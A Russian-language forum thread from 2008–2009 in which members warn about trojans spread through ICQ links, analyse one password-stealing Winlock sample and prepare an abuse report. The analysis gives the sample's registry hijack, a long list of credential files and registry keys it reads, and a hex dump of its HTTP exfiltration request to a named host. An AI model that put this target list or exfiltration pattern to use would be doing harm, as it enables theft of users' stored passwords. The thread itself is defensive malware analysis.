Последние файлы
Наши партнеры
Важная информация
Новый ICQ троян
Только факты - В данном разделе собирается информация по фактам мошенничества, воровства и т.п. Просьба ко всем участникам размещать здесь сообщения о реальных фактах преступных действий физических и юридических лиц.
Ответ
 
Опции темы
  • Новое
    Аватар для NoName®

    NoName®
    Разработчик продукта

    Сообщений:
    949
    Регистрация:
    17.05.2006
    Возраст:
    41
    Рейтинг мнений: 1326
    Вес репутации: 371
    NoName® NoName® NoName® NoName® NoName® NoName® NoName® NoName® NoName® NoName® NoName®
    Очки: 30,958, Уровень: 100 Очки: 30,958, Уровень: 100 Очки: 30,958, Уровень: 100
    Активность: 5% Активность: 5% Активность: 5%
    По умолчанию Новый ICQ троян #1
    Вобщем если в двух чертах , то

    Знакомые контакты присылают вам сообщение типа

    h**p://absoluts.org/img/live.gif

    Картинкой по этой ссылке не пахнет вовсе ссылка возвращает html редирект - браузер отображает сразу две урлы - одна http://absoluts.org/img/2410232.jpg - в этой нет ничего ужасного )

    Вторая h**p://linenetz.com/stats/ru1.php что отдаёт данный PHP пока не знаю , вроде следующий редирект но ничем хорошим это не пахнет.

    Всем удачи , и будте внимательны чтоб не писать в топике про угон асек )

    Собственно сама картинка )
    __________________

    Последний раз редактировалось NoName®; 16.11.2008 в 12:44.
    16.11.2008, 12:10
    Ответить с цитированием
    15 пользователя(ей) добавили плюсы
    alfv (16.11.2008), asaban (16.11.2008), eddiman (17.11.2008), gena (16.11.2008), gsm-brest (16.11.2008), Habib (16.11.2008), hank6 (16.11.2008), Master_X (16.11.2008), Nics (17.11.2008), Porter (16.11.2008), Recar (16.11.2008), shirokov (16.11.2008), vovic (16.11.2008), zioom (16.11.2008), ФЕНИКС26 (17.11.2008)
  • Новое
    Аватар для alfv

    alfv
    MCRF Инженер

    Сообщений:
    331
    Регистрация:
    21.06.2005
    Возраст:
    45
    Рейтинг мнений: 431
    Вес репутации: 263
    alfv alfv alfv alfv alfv alfv alfv alfv alfv alfv alfv
    Очки: 15,628, Уровень: 80 Очки: 15,628, Уровень: 80 Очки: 15,628, Уровень: 80
    Активность: 5% Активность: 5% Активность: 5%
    По умолчанию Re: Новый ICQ троян #2
    Ага , картинку эту видел . Но аська еще со мной
    16.11.2008, 14:11
    Ответить с цитированием
  • Новое
    Аватар для bond95

    bond95
     

    Сообщений:
    2,090
    Регистрация:
    26.06.2005
    Возраст:
    62
    Рейтинг мнений: 3219
    Вес репутации: 0
    bond95 bond95 bond95 bond95 bond95 bond95 bond95 bond95 bond95 bond95 bond95
    Очки: 62,873, Уровень: 100 Очки: 62,873, Уровень: 100 Очки: 62,873, Уровень: 100
    Активность: 5% Активность: 5% Активность: 5%
    По умолчанию Re: Новый ICQ троян #3
    Есть такое дело ..Еще одна ссылка присутствует ..даже не одна

    Цитата:
    tolik07 (28.10.08 7:45) :
    привет
    h**p://fettz.net/54489/
    посмотри, классная вещь!

    tolik07 (3:02) : (а это сегодня утром )
    привет
    h**p://absoluts.org/00700/
    посмотри, классная вещь!
    Но так как к подобным фокусам уже выработанное отношение то естественно не открываю никогда ..
    __________________
    Достигает вершин лишь тот, кто не боится пробовать и больше ДЕЙСТВУЕТ, чем сомневается!

    Последний раз редактировалось bond95; 16.11.2008 в 15:14.
    16.11.2008, 15:13
    Ответить с цитированием
  • Новое
    Аватар для FA_

    FA_
    MCRF Инженер

    Сообщений:
    597
    Регистрация:
    30.09.2005
    Возраст:
    46
    Рейтинг мнений: 1257
    Вес репутации: 463
    FA_ FA_ FA_ FA_ FA_ FA_ FA_ FA_ FA_ FA_ FA_
    Очки: 39,356, Уровень: 100 Очки: 39,356, Уровень: 100 Очки: 39,356, Уровень: 100
    Активность: 10% Активность: 10% Активность: 10%
    По умолчанию Re: Новый ICQ троян #4
    Добавлю: в день получаю таких ссылок 2-3, при чем хозяева асек знают об этом, и никакая смена пороля и т.п. не помогает... (или говорят что не помогает).
    16.11.2008, 15:40
    Ответить с цитированием
  • Новое
    Аватар для Recar

    Recar
    Участник
    Действительный участник ассоциации MCRF.RU

    Сообщений:
    173
    Регистрация:
    21.02.2007
    Возраст:
    42
    Рейтинг мнений:
    Вес репутации: 225
    Recar Recar Recar Recar Recar Recar
    Очки: 7,267, Уровень: 56 Очки: 7,267, Уровень: 56 Очки: 7,267, Уровень: 56
    Активность: 5% Активность: 5% Активность: 5%
    По умолчанию Re: Новый ICQ троян #5
    Цитата:
    Сообщение от FA_ Посмотреть сообщение
    Добавлю: в день получаю таких ссылок 2-3, при чем хозяева асек знают об этом, и никакая смена пороля и т.п. не помогает... (или говорят что не помогает).
    Так если у них на компе сидит вирус, то хоть заменяйся пароль, всёравно при запуске аськи начнёт рассылать, от пароля не зависит, ведь он сам его и вводит. Причём антивирусы зачастую не всегда видят эту вредоносную програмку.


    ОФФтопик:
    картинка напомнила фильм "звонок".

    16.11.2008, 16:39
    Ответить с цитированием
  • Новое
    Аватар для FA_

    FA_
    MCRF Инженер

    Сообщений:
    597
    Регистрация:
    30.09.2005
    Возраст:
    46
    Рейтинг мнений: 1257
    Вес репутации: 463
    FA_ FA_ FA_ FA_ FA_ FA_ FA_ FA_ FA_ FA_ FA_
    Очки: 39,356, Уровень: 100 Очки: 39,356, Уровень: 100 Очки: 39,356, Уровень: 100
    Активность: 10% Активность: 10% Активность: 10%
    По умолчанию Re: Новый ICQ троян #6
    Цитата:
    Сообщение от Recar Посмотреть сообщение
    Так если у них на компе сидит вирус, то хоть заменяйся пароль, всёравно при запуске аськи начнёт рассылать, от пароля не зависит, ведь он сам его и вводит. Причём антивирусы зачастую не всегда видят эту вредоносную програмку.


    ОФФтопик:
    картинка напомнила фильм "звонок".
    Самый злостный спамер заходит в аську только с мобилки, а когда он оффлайн - пару раз в сути вижу от него такую вот срань...
    _______________________________

    alfv, картинка всё та же...

    Последний раз редактировалось FA_; 16.11.2008 в 20:38.
    16.11.2008, 19:18
    Ответить с цитированием
  • Новое
    Аватар для alfv

    alfv
    MCRF Инженер

    Сообщений:
    331
    Регистрация:
    21.06.2005
    Возраст:
    45
    Рейтинг мнений: 431
    Вес репутации: 263
    alfv alfv alfv alfv alfv alfv alfv alfv alfv alfv alfv
    Очки: 15,628, Уровень: 80 Очки: 15,628, Уровень: 80 Очки: 15,628, Уровень: 80
    Активность: 5% Активность: 5% Активность: 5%
    По умолчанию Re: Новый ICQ троян #7
    У меня между прочим тоже пришло от человека , который сидит в аське только с мобилки .
    Может это новый вирь для смартфонов ?
    ps А картинго какаято зомбирующая

    Последний раз редактировалось alfv; 16.11.2008 в 20:10.
    16.11.2008, 20:09
    Ответить с цитированием
  • Новое
    Аватар для Morfeus

    Morfeus
    MCRF Инженер

    Сообщений:
    381
    Регистрация:
    10.02.2007
    Возраст:
    42
    Рейтинг мнений: 1424
    Вес репутации: 416
    Morfeus Morfeus Morfeus Morfeus Morfeus Morfeus Morfeus Morfeus Morfeus Morfeus Morfeus
    Очки: 33,999, Уровень: 100 Очки: 33,999, Уровень: 100 Очки: 33,999, Уровень: 100
    Активность: 0% Активность: 0% Активность: 0%
    По умолчанию Re: Новый ICQ троян #8
    Внимание очередной троян, антивирусными программами пока не определяется, рассылается по ICQ, от пользователей включённых в список контактов и соответственно при заражении таким же образом рассылается, вот в таком виде:
    Цитата:
    никого не узнаёшь на этой фотке? гг))
    http://**-**.com/img/foto35.gif
    и через нескольком минут следующее:
    Цитата:
    заметно что фотка в фотошопе отредактирована или нет?
    http://**-**.com/img/foto35.gif
    При попытке пройти по ссылке, срабатывает менеджер загрузки и по редиректу предлагает сохранить вот такой файл: foto35.scr - программа-заставка.
    Вот скрин с результами проверки на сайте Virus Total. Определяют эту дрянь пока всего 4 антивируса, инфа на скрине, образец заразы отправлен в службу Касперского. DrWeb определяет эту гадость вот так: DrWeb 5.0.0.12182 2009.09.23 Trojan.Winlock.252
    Так что будьте БДИТЕЛЬНЫ!

    Здесь был вложен файл: screen.jpg (80.2 Кб), но к сожалению был утерян. Если он у Вас есть, свяжитесь с администрацией для его восстановления. Спасибо.

    Последний раз редактировалось Morfeus; 23.09.2009 в 16:44.
    23.09.2009, 14:53
    Ответить с цитированием
    11 пользователя(ей) добавили плюсы
    Alexbig (23.09.2009), AVL (23.09.2009), Drej (23.09.2009), gena (23.09.2009), Habib (23.09.2009), IgorYas (24.09.2009), Quest (23.09.2009), sasha313 (23.09.2009), shirokov (23.09.2009), VictorMan (23.09.2009), vitpod (24.09.2009)
  • Новое
    Аватар для Фортэс

    Фортэс
    Участник
    Действительный участник ассоциации MCRF.RU

    Сообщений:
    368
    Регистрация:
    02.12.2008
    Возраст:
    44
    Рейтинг мнений: 486
    Вес репутации: 315
    Фортэс Фортэс Фортэс Фортэс Фортэс Фортэс Фортэс Фортэс Фортэс Фортэс Фортэс
    Очки: 22,345, Уровень: 92 Очки: 22,345, Уровень: 92 Очки: 22,345, Уровень: 92
    Активность: 0% Активность: 0% Активность: 0%
    По умолчанию Re: Новый ICQ троян #9
    Попросил у MorfeusJohn'a этого трояна для исследований. Вот что удалось узнать:

    При запуске создаются файлы:
    c:\windows\explorerr.exe - ворует пароли
    c:\windows\svcoost.exe - блокирует систему
    для отвода глаз показывается фотка, спрятанная в ресурсах.

    Меняется ключ реестра
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\
    значение параметра Shell меняется с "explorer.exe" на "c:\windows\svcoost.exe"

    файл foto35.scr удаляется с помощью временного файла 154.bat (который потом удаляет сам себя)

    Читаются файлы, содержащие пароли браузеров и т.д.
    C:\WINDOWS\WCX_FTP.INI - настройки ftp-серверов из TotalCommander
    C:\DOCUMENTS AND SETTINGS\"ИМЯ_АКТИВНОГО_ПОЛЬЗОВ АТЕЛЯ"\APPLICATION DATA\OPERA\OPERA\PROFILE\WAND.DAT - пароли оперы
    C:\DOCUMENTS AND SETTINGS\"ИМЯ_АКТИВНОГО_ПОЛЬЗОВ АТЕЛЯ"\APPLICATION DATA\OPERA\OPERA\MAIL\ACCOUNTS.INI - почта из оперы
    C:\DOCUMENTS AND SETTINGS\"ИМЯ_АКТИВНОГО_ПОЛЬЗОВ АТЕЛЯ"\APPLICATION DATA\THUNDERBIRD\PROFILES.INI - почта MozillaThunderbird

    Все найденный пароли отправляются по http на адрес http://v1902.vps.masterhost.ru/


    Для тех кто запускал этот вирус
    Лечение очень простое - загрузиться с любого Live-CD, подключить реестр заражённого компьютера и изменить в ключе
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\
    значение параметра Shell на "explorer.exe"

    Ну и не забудьте поменять свои пароли

    Последний раз редактировалось Фортэс; 25.09.2009 в 00:51.
    23.09.2009, 22:07
    Ответить с цитированием
    15 пользователя(ей) добавили плюсы
    Bodirog (25.09.2009), eddiman (24.09.2009), gena (23.09.2009), glider (23.09.2009), IgorYas (24.09.2009), Ildus_u (23.09.2009), JonyKES (21.01.2010), Mad Dog (24.09.2009), Morfeus (23.09.2009), Porter (23.09.2009), sasha313 (24.09.2009), shirokov (23.09.2009), ToXal (24.09.2009), Trudyaga (24.09.2009), vitpod (24.09.2009)
  • Новое
    Аватар для vitpod

    vitpod
    Забанен

    Сообщений:
    4
    Регистрация:
    25.01.2008
    Возраст:
    41
    Рейтинг мнений: -112
    Вес репутации: 0
    vitpod
    Очки: 2,693, Уровень: 31 Очки: 2,693, Уровень: 31 Очки: 2,693, Уровень: 31
    Активность: 0% Активность: 0% Активность: 0%
    По умолчанию Re: Новый ICQ троян #10
    Также создается файл ForLOOsers.txt - в нем содержится следующая информация:

    1050695522
    pn2n16

    возможно это пароль для разблокировки системы, проверить я не удосужился.

    в моём случае, еще и права пользователя заблокировались + пропала панель задач.
    для её включения необходимо создать нового пользователя и добавить в реестр следующую информацию:
    см. файл

    затем перезагрузить компьютер.

    Затем чтобы включить CTRL+ALT+DEL правим реестр
    [HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\System] DisableTaskMgr на значение 0.

    Здесь был вложен файл: task.zip (344 байт), но к сожалению был утерян. Если он у Вас есть, свяжитесь с администрацией для его восстановления. Спасибо.

    Последний раз редактировалось vitpod; 24.09.2009 в 11:46.
    24.09.2009, 08:39
    Ответить с цитированием
  • Новое
    Аватар для IgorYas

    IgorYas
    Участник
    Действительный участник ассоциации MCRF.RU

    Сообщений:
    164
    Регистрация:
    17.07.2005
    Возраст:
    51
    Рейтинг мнений: 515
    Вес репутации: 247
    IgorYas IgorYas IgorYas IgorYas IgorYas IgorYas IgorYas
    Очки: 8,044, Уровень: 60 Очки: 8,044, Уровень: 60 Очки: 8,044, Уровень: 60
    Активность: 4% Активность: 4% Активность: 4%
    По умолчанию Re: Новый ICQ троян #11
    Цитата:
    необходимо создать нового пользователя и добавить в реестр следующую информацию:
    см. файл

    затем перезагрузить компьютер.

    Затем чтобы включить CTRL+ALT+DEL правим реестр
    [HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\System] DisableTaskMgr на значение 0.
    Тоже самое можно сделать не создавая новую учетную запись, а загрузившись с LIVE-CD.
    Попутно разрешить правку реестра и подправить Shell.
    Впрочем, кому как удобнее...
    24.09.2009, 13:36
    Ответить с цитированием
  • Новое
    Аватар для Mad Dog

    Mad Dog
    Участник
    Действительный участник ассоциации MCRF.RU

    Сообщений:
    19
    Регистрация:
    19.03.2006
    Возраст:
    41
    Рейтинг мнений:
    Вес репутации: 228
    Mad Dog
    Очки: 5,330, Уровень: 46 Очки: 5,330, Уровень: 46 Очки: 5,330, Уровень: 46
    Активность: 8% Активность: 8% Активность: 8%
    По умолчанию Re: Новый ICQ троян #12
    Скрытый текст (вы должны зарегистрироваться или войти под своим логином):
    У вас нет прав чтобы видеть скрытый текст, содержащейся здесь.


    Собственно, предлагаю доковырять трояна и прикрыть навсегда. ))
    24.09.2009, 13:48
    Ответить с цитированием
  • Новое
    Аватар для Фортэс

    Фортэс
    Участник
    Действительный участник ассоциации MCRF.RU

    Сообщений:
    368
    Регистрация:
    02.12.2008
    Возраст:
    44
    Рейтинг мнений: 486
    Вес репутации: 315
    Фортэс Фортэс Фортэс Фортэс Фортэс Фортэс Фортэс Фортэс Фортэс Фортэс Фортэс
    Очки: 22,345, Уровень: 92 Очки: 22,345, Уровень: 92 Очки: 22,345, Уровень: 92
    Активность: 0% Активность: 0% Активность: 0%
    По умолчанию Re: Новый ICQ троян #13
    Mad Dog, вот дополнительные данные для абузы.

    все пароли шлются через сокет на адрес http://www.ch-mz.ru/images/catalog/icon/fg54h.php.

    Вот конкретно текст отправки через Send после чтения всех паролей
    Код:
    00A40020  50 4F 53 54 20 2F 69 6D 61 67 65 73 2F 63 61 74  POST /images/cat
    00A40030  61 6C 6F 67 2F 69 63 6F 6E 2F 66 67 35 34 68 2E  alog/icon/fg54h.
    00A40040  70 68 70 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F  php HTTP/1.0..Ho
    00A40050  73 74 3A 20 77 77 77 2E 63 68 2D 6D 7A 2E 72 75  st: www.ch-mz.ru
    00A40060  0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20  ..Content-Type:
    00A40070  61 70 70 6C 69 63 61 74 69 6F 6E 2F 78 2D 77 77  application/x-ww
    00A40080  77 2D 66 6F 72 6D 2D 75 72 6C 65 6E 63 6F 64 65  w-form-urlencode
    00A40090  64 0D 0A 43 6F 6E 6E 65 63 74 69 6F 6E 3A 20 4B  d..Connection: K
    00A400A0  65 65 70 2D 41 6C 69 76 65 0D 0A 50 72 61 67 6D  eep-Alive..Pragm
    00A400B0  61 3A 20 6E 6F 2D 63 61 63 68 65 0D 0A 55 73 65  a: no-cache..Use
    00A400C0  72 2D 41 67 65 6E 74 3A 20 4D 6F 7A 69 6C 6C 61  r-Agent: Mozilla
    00A400D0  2F 34 2E 30 20 28 63 6F 6D 70 61 74 69 62 6C 65  /4.0 (compatible
    00A400E0  3B 20 4D 53 49 45 20 36 2E 30 3B 20 57 69 6E 64  ; MSIE 6.0; Wind
    00A400F0  6F 77 73 20 4E 54 20 35 2E 31 3B 20 53 56 31 3B  ows NT 5.1; SV1;
    00A40100  20 49 6E 66 6F 50 61 74 68 2E 32 3B 20 2E 4E 45   InfoPath.2; .NE
    00A40110  54 20 43 4C 52 20 32 2E 30 2E 35 30 37 32 37 3B  T CLR 2.0.50727;
    00A40120  20 49 6E 66 6F 50 61 74 68 2E 31 29 0D 0A 43 6F   InfoPath.1)..Co
    00A40130  6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 33 35  ntent-Length: 35
    00A40140  35 36 0D 0A 0D 0A 61 3D 26 62 3D 67 74 26 64 3D  56....a=&b=gt&d=
    00A40150  72 74 26 63 3D 00 00 00 00 00 00 00 00 00 00 00  rt&c=...........
    сами данные с паролями я вырезал.

    Код:
    Traceroute
    Tracing route to www.ch-mz.ru [87.242.98.91]...
    
    hop rtt rtt rtt   ip address fully qualified domain name 
    1 4 0 1   70.84.211.97 61.d3.5446.static.theplanet.com 
    2 0 0 0   70.87.254.5 po101.dsr02.dllstx5.theplanet.com 
    3 0 0 0   70.85.127.109 po52.dsr02.dllstx3.theplanet.com 
    4 0 0 0   70.87.253.21 et3-1.ibr03.dllstx3.theplanet.com 
    5 32 32 32   70.87.253.190 be.fd.5746.static.theplanet.com 
    6 32 51 32   206.223.115.96 equinix.ashb.retn.net 
    7 143 142 142   87.245.233.205 xe120-2.rt.tc1.sto.se.retn.net 
    8 193 167 167   90.156.216.32 max2.pvc.masterhost.ru 
    9 167 191 168   87.242.98.91 v1902.vps.masterhost.ru 
    
    Trace complete
    Думаю этого будет для них достаточно




    сайт http://www.ch-mz.ru зарегистрирован у хостера www.masterhost.ru . Можно проверить через этот сервис

    Код:
    Address lookup
    canonical name ch-mz.ru. 
    aliases www.ch-mz.ru
     
    addresses 87.242.98.91
     
    
    Domain Whois record
    Queried whois.ripn.net with "ch-mz.ru"...
    
    % By submitting a query to RIPN's Whois Service
    % you agree to abide by the following terms of use:
    % http://www.ripn.net/about/servpol.html#3.2 (in Russian) 
    % http://www.ripn.net/about/en/servpol.html#3.2 (in English).
    
    ВЛАДЕЛЕЦ САЙТА
    domain:     CH-MZ.RU
    type:       CORPORATE
    nserver:    ns1.budagovsky.ru.
    nserver:    ns2.budagovsky.ru.
    state:      REGISTERED, DELEGATED
    person:     Private Person
    phone:      +7 9021 762483
    e-mail:     [email protected]
    registrar:  REGTIME-REG-RIPN
    created:    2007.12.19
    paid-till:  2009.12.19
    source:     TC-RIPN
    
    
    Last updated on 2009.09.25 00:02:05 MSK/MSD
    
    
    Network Whois record
    Queried whois.ripe.net with "-B 87.242.98.91"...
    
    % Information related to '87.242.98.0 - 87.242.99.255'
    
    inetnum:        87.242.98.0 - 87.242.99.255
    netname:        MASTERHOST-VPS-2
    descr:          MasterHost VPS services
    country:        RU
    admin-c:        MHST-RIPE
    tech-c:         MHST-RIPE
    status:         ASSIGNED PA
    notify:         [email protected]
    mnt-by:         MASTERHOST-MNT
    changed:        [email protected] 20060502
    source:         RIPE
    
    role:           MASTERHOST NOC
    address:        .masterhost
    address:        Lyalin lane 3, bld 3
    address:        105062 Moscow
    address:        Russia
    phone:          +7 495 7729720
    fax-no:         +7 495 7729723
    e-mail:         [email protected]
    remarks:        ----------------------------------------------------------
    remarks:        MASTERHOST is available 24 x 7
    remarks:        ----------------------------------------------------------
    remarks:        Points of contact for MASTERHOST Network Operations
    remarks:        ----------------------------------------------------------
    remarks:        Routing and peering issues:       [email protected]
    remarks:        SPAM and Network security issues: [email protected]
    remarks:        Mail and News issues:             [email protected]
    remarks:        Customer support:                 [email protected]
    remarks:        General information:              [email protected]
    remarks:        ----------------------------------------------------------
    admin-c:        AAS-RIPE
    tech-c:         AAS-RIPE
    tech-c:         UNK-RIPE
    nic-hdl:        MHST-RIPE
    notify:         [email protected]
    abuse-mailbox:  [email protected]
    mnt-by:         MASTERHOST-MNT
    changed:        [email protected] 20050714
    changed:        [email protected] 20050802
    changed:        [email protected] 20070410
    source:         RIPE
    
    % Information related to '87.242.64.0/18AS25532'
    
    route:          87.242.64.0/18
    descr:          .masterhost
    origin:         AS25532
    notify:         [email protected]
    mnt-by:         MASTERHOST-MNT
    changed:        [email protected] 20050729
    source:         RIPE
    
    DNS records
    name class type data time to live 
    www.ch-mz.ru IN CNAME ch-mz.ru 86127s (23:55:27) 
    ch-mz.ru IN MX preference: 10 
    exchange: mail.ch-mz.ru 
     86400s (1.00:00:00) 
    ch-mz.ru IN SOA server: ns2.budagovsky.ru 
    email: ars.budagovsky.ru 
    serial: 0 
    refresh: 10800 
    retry: 3600 
    expire: 604800 
    minimum ttl: 10800 
     86400s (1.00:00:00) 
    ch-mz.ru IN NS ns2.budagovsky.ru 86400s (1.00:00:00) 
    ch-mz.ru IN NS ns1.budagovsky.ru 86400s (1.00:00:00) 
    ch-mz.ru IN A 87.242.98.91 86400s (1.00:00:00) 
    91.98.242.87.in-addr.arpa IN PTR v1902.vps.masterhost.ru 628s (00:10:28)



    В первый раз я не совсем точно посмотрел что именно воруется из системы. Вот примерный список.

    файлы:
    Код:
    C:\WINDOWS\WCX_FTP.INI
    C:\Documents and Settings\Пользователь\Application Data\OPERA\OPERA\PROFILE\WAND.DAT
    C:\Documents and Settings\Пользователь\Application Data\OPERA\OPERA\MAIL\ACCOUNTS.INI
    C:\Documents and Settings\Пользователь\Application Data\THUNDERBIRD\PROFILES.INI
    C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP\sm.dat
    C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP\2.0\sm.dat
    C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP\3.0\sm.dat
    C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP\5.0\sm.dat
    C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP\6.0\sm.dat
    C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP\7.0\sm.dat
    C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP\8.0\sm.dat
    C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP Pro\sm.dat
    C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP Pro\2.0\sm.dat
    C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP Pro\3.0\sm.dat
    C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP Pro\5.0\sm.dat
    C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP Pro\6.0\sm.dat
    C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP Pro\7.0\sm.dat
    C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP Pro\8.0\sm.dat
    C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 7 Professional\sm.dat
    C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 7 Professional\2.0\sm.dat
    C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 7 Professional\3.0\sm.dat
    C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 7 Professional\5.0\sm.dat
    C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 7 Professional\6.0\sm.dat
    C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 7 Professional\7.0\sm.dat
    C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 7 Professional\8.0\sm.dat
    C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 8 Professional\sm.dat
    C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 8 Professional\2.0\sm.dat
    C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 8 Professional\3.0\sm.dat
    C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 8 Professional\5.0\sm.dat
    C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 8 Professional\6.0\sm.dat
    C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 8 Professional\7.0\sm.dat
    C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 8 Professional\8.0\sm.dat
    C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP\sm.dat
    C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP\2.0\sm.dat
    C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP\3.0\sm.dat
    C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP\5.0\sm.dat
    C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP\6.0\sm.dat
    C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP\7.0\sm.dat
    C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP\8.0\sm.dat
    C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP Pro\sm.dat
    C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP Pro\2.0\sm.dat
    C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP Pro\3.0\sm.dat
    C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP Pro\5.0\sm.dat
    C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP Pro\6.0\sm.dat
    C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP Pro\7.0\sm.dat
    C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP Pro\8.0\sm.dat
    C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 7 Professional\sm.dat
    C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 7 Professional\2.0\sm.dat
    C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 7 Professional\3.0\sm.dat
    C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 7 Professional\5.0\sm.dat
    C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 7 Professional\6.0\sm.dat
    C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 7 Professional\7.0\sm.dat
    C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 7 Professional\8.0\sm.dat
    C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 8 Professional\sm.dat
    C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 8 Professional\2.0\sm.dat
    C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 8 Professional\3.0\sm.dat
    C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 8 Professional\5.0\sm.dat
    C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 8 Professional\6.0\sm.dat
    C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 8 Professional\7.0\sm.dat
    C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 8 Professional\8.0\sm.dat
    C:\Documents and Settings\Пользователь\Application Data\.gaim\accounts.xml
    C:\Documents and Settings\Пользователь\Application Data\FileZilla\sitemanager.xml
    C:\WINDOWS\VD3User.dat
    C:\WINDOWS\Vd3main.dat
    C:\Program Files\FTP Commander\Ftplist.txt
    C:\Program Files\FTP Commander Pro\Ftplist.txt
    C:\Program Files\FTP Commander Deluxe\Ftplist.txt
    C:\Program Files\Total Commander\Profiles\Prof\ftp.ini
    C:\WINDOWS\edialer.ini
    C:\Program Files\Trillian\User Settings\*.*
    ключи реестра
    Код:
    SOFTWARE\RIT\The Bat!
    SOFTWARE\Mirabilis\ICQ\DefaultPrefs
    SOFTWARE\Mirabilis\ICQ\NewOwners
    Software\Ghisler\Windows Commander
    Software\Ghisler\Total Commander
    Software\RimArts\B2\Settings
    Software\Microsoft\Internet Account Manager\Accounts
    SOFTWARE\Far\Plugins\FTP\Hosts
    Software\Mail.Ru\Agent\mra_logins
    Software\CoffeeCup Software\Internet\Profiles



    Всем удачи берегите свои данные

    Последний раз редактировалось Фортэс; 25.09.2009 в 01:01.
    25.09.2009, 00:15
    Ответить с цитированием
    15 пользователя(ей) добавили плюсы
    bond95 (25.09.2009), gena (25.09.2009), Habib (25.09.2009), IgorYas (25.09.2009), Mad Dog (25.09.2009), MobilaGSM (25.09.2009), Morfeus (25.09.2009), Nics (25.09.2009), NoName® (25.09.2009), Oleg_Rus (25.09.2009), pontiak (25.09.2009), SergDeParchi (25.09.2009), shirokov (25.09.2009), Vasilio (19.10.2009), vitpod (25.09.2009)
  • Новое
    Аватар для Mad Dog

    Mad Dog
    Участник
    Действительный участник ассоциации MCRF.RU

    Сообщений:
    19
    Регистрация:
    19.03.2006
    Возраст:
    41
    Рейтинг мнений:
    Вес репутации: 228
    Mad Dog
    Очки: 5,330, Уровень: 46 Очки: 5,330, Уровень: 46 Очки: 5,330, Уровень: 46
    Активность: 8% Активность: 8% Активность: 8%
    По умолчанию Re: Новый ICQ троян #14
    Скрытый текст (вы должны зарегистрироваться или войти под своим логином):
    У вас нет прав чтобы видеть скрытый текст, содержащейся здесь.


    Вот собственно и добились желаемого результата. Надеюсь трояна прикроют.
    25.09.2009, 12:58
    Ответить с цитированием
    4 пользователя(ей) добавили плюсы
    Morfeus (25.09.2009), Porter (25.09.2009), Vasilio (19.10.2009), Фортэс (25.09.2009)
  • Новое
    Аватар для mazepa

    mazepa
    Сенсей

    Сообщений:
    1,136
    Регистрация:
    23.06.2005
